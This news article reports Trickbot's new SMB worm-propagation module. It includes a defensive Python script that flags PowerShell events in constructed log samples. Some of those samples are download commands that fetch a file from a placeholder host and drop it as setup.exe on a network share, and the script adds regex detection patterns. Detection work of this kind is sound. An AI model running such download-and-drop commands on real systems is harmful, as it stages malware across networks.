Hackers responsible for one of the most common forms of banking Trojans have learned lessons from the global WannaCry ransomware outbreak and the Petya cyberattack, and have equipped their malware with a worm propagation module to help it spread more efficiently.
The credential-stealing Trickbot has been hitting the financial sector since last year and more recently it has added a long list of UK and US banks to its targets. The attacks are few in number but highly targeted. The malware is spread via emails that claim to be from an international financial institution, which then lead the victim to a fake login page used to steal credentials.
Now the gang behind Trickbot is testing additional techniques in a new version of the malware, known as 1000029, and researchers at Flashpoint who have been watching it say it can spread via Server Message Block (SMB), crudely replicating the SMB-based propagation that allowed WannaCry and Petya to spread around the world so quickly.
EternalBlue, an exploit for a flaw in Windows’ Server Message Block (SMB) networking protocol, was one of many allegedly known to US intelligence services and used for surveillance before being leaked by the Shadow Brokers hacking group. Malware that uses the exploit can spread itself across a network with worm-like capabilities, with no user interaction required.
Using SMB, Trickbot can now scan domains for lists of servers via the NetServerEnum Windows API and establish the number of computers on the network using Lightweight Directory Access Protocol (LDAP) enumeration.
The malware can also use inter-process communication to propagate and execute a PowerShell script as its final payload, which downloads an additional copy of Trickbot, this time disguised as ‘setup.exe’, onto a shared drive.
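From the defender’s side, the final step described above (a PowerShell payload fetching a second copy of the malware and writing it as ‘setup.exe’ to a network share) leaves a recognisable trace in process-creation telemetry. The following is an added example, not code from the article or from Flashpoint: it scores constructed log lines for that combination of traits. The log format (`host|parent|image|cmdline`), host names and URLs are assumptions made for the illustration.

```python
import re

# Constructed sample process-creation events (hypothetical "host|parent|image|cmdline" format).
# These are illustrative records, not captured Trickbot telemetry.
SAMPLE_EVENTS = [
    "WS01|explorer.exe|C:\\Windows\\System32\\notepad.exe|notepad.exe report.txt",
    "WS01|svchost.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "powershell.exe -nop -w hidden -c (New-Object Net.WebClient).DownloadFile("
    "'http://example.invalid/x','\\\\FS01\\public\\setup.exe')",
    "WS02|cmd.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "powershell.exe Get-Process",
    "WS03|services.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "powershell.exe Invoke-WebRequest http://example.invalid/x -OutFile \\\\FS01\\share\\setup.exe",
]

# Traits the article describes: a download, a drop named setup.exe on a UNC share path,
# plus two generic PowerShell-abuse signals (hidden/encoded invocation, service-like parent).
DOWNLOAD_CMDLETS = re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I)
UNC_SETUP_DROP = re.compile(r"\\\\[\w.-]+\\[^\s'\"]+\\setup\.exe", re.I)
HIDDEN_FLAGS = re.compile(r"-(w(indowstyle)?\s+hidden|nop|enc(odedcommand)?)\b", re.I)
SERVICE_PARENTS = {"svchost.exe", "services.exe", "wmiprvse.exe"}


def score_event(line):
    """Return (score, reasons) for one event; non-PowerShell images score 0."""
    host, parent, image, cmdline = line.split("|", 3)
    if not image.lower().endswith("powershell.exe"):
        return 0, []
    reasons = []
    if DOWNLOAD_CMDLETS.search(cmdline):
        reasons.append("download cmdlet")
    if UNC_SETUP_DROP.search(cmdline):
        reasons.append("setup.exe written to share")
    if HIDDEN_FLAGS.search(cmdline):
        reasons.append("hidden/encoded invocation")
    if parent.lower() in SERVICE_PARENTS:
        reasons.append("service-like parent")
    return len(reasons), reasons


def find_suspicious(lines, threshold=2):
    """Return [(host, score, reasons)] for events at or above the threshold."""
    hits = []
    for line in lines:
        score, reasons = score_event(line)
        if score >= threshold:
            hits.append((line.split("|", 1)[0], score, reasons))
    return hits


if __name__ == "__main__":
    for host, score, reasons in find_suspicious(SAMPLE_EVENTS):
        print(host, score, ", ".join(reasons))
```

A single trait (any download cmdlet, any hidden window) is common in legitimate administration; requiring two or more, with the share-drop as the strongest signal, keeps the rule focused on the behaviour the article describes.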
Crucially, this test version of Trickbot doesn’t appear to be fully implemented by the gang behind the malware, nor can it randomly scan external IP addresses for SMB connections, as the worm behind the WannaCry ransomware did.
Nonetheless, researchers warn that this development once again demonstrates the evolving, professional work of the cybercrime gang behind Trickbot as they examine further ways to steal financial data from banks and private wealth management firms.
Ultimately, if successfully deployed, the worm could allow Trickbot to infect other computers on the same network as the machine initially compromised by a phishing email, either to steal more credentials and take over more accounts, or to rope those machines into a botnet that spreads further malware.
“Even though the worm module appears to be rather crude in its present state, it is evident that the Trickbot gang learned from the global ransomware worm-like outbreaks of WannaCry and NotPetya and is attempting to replicate their methodology,” said Vitali Kremez, director of Research at Flashpoint.
While Trickbot isn’t as prolific as the likes of Zeus, Gozi, Ramnit, and Dridex, researchers warn that it will continue to be a “formidable force” in future, as its authors look to add more potent capabilities to this dangerous malware.